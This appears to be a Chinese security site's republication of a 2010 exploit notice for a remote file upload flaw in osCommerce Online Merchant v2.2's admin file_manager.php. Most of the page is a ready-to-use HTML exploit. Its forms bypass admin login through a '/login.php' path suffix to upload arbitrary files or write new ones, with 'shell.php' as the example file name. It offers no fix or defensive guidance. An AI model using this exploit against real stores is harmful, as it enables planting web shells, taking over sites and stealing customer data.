首页 | 关于我们 | 巨鲸报价
web渗透测试 网站安全加固 网站安全建设 客户成功案例
黑客(hacker)可以通过漏洞进行相应的破坏,在我国,每年因黑客入侵、造成了巨大的经济损 失。商业信息丢失、客户资料被盗,数据损坏、网络攻击、等.....
Launch Website 返回首页

 

您现在的位置: 巨鲸网络安全 >> 漏洞公布 >> W E B >> 正文>>   
 

Oscommerce Online Merchant v2.2 - Remote File Upload

Oday来源:黑白前线 Oday作者:佚名 更新时间:2010-9-1 Oday点击: (在线Oday订阅)

Oday摘要: 发布日期:2010-05.31发布作者:MasterGipy影响版本:OscommerceOnlineMerchantv2.2官方地址:http://www.oscommerce.com漏洞描述:OscommerceOnlineMerchantv2.2程序存在文件上传漏洞。vulnerablefile:/admin/file_manager.php[REMOTEFILEUPLOADVULNERAB
 


  1. 发布日期:2010-05.31  
  2. 发布作者:MasterGipy   
  3. 影响版本:Oscommerce Online Merchant v2.2
  4. 官方地址: http://www.oscommerce.com
  5. 漏洞描述: Oscommerce Online Merchant v2.2程序存在文件上传漏洞。
  6.  
  7. vulnerable file: /admin/file_manager.php

     

    [REMOTE FILE UPLOAD VULNERABILITY]

     

    [$] Exploit:

     

     

 
 

  1. <html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>   
  2.  
  3. <br><br><u>UPLOAD FILE:</u><br>   
  4.  
  5. <form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">   
  6.  
  7. <input type="file" name="file_1"><br>   
  8.  
  9. <input name="submit" type="submit" value=" Upload " >   
  10.  
  11. </form>   
  12.  
  13.  
  14. <br><u>CREATE FILE:</u><br>   
  15.  
  16. <form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">   
  17.  
  18. FILE NAME:<br>   
  19.  
  20. <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>   
  21.  
  22. <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>   
  23.  
  24. <input name="submit" type="submit" value=" Save " >   
  25.  
  26. </form>   
  27.  
  28. </html>   

 

 


  • 上一篇文章:

  •  

    相关文章: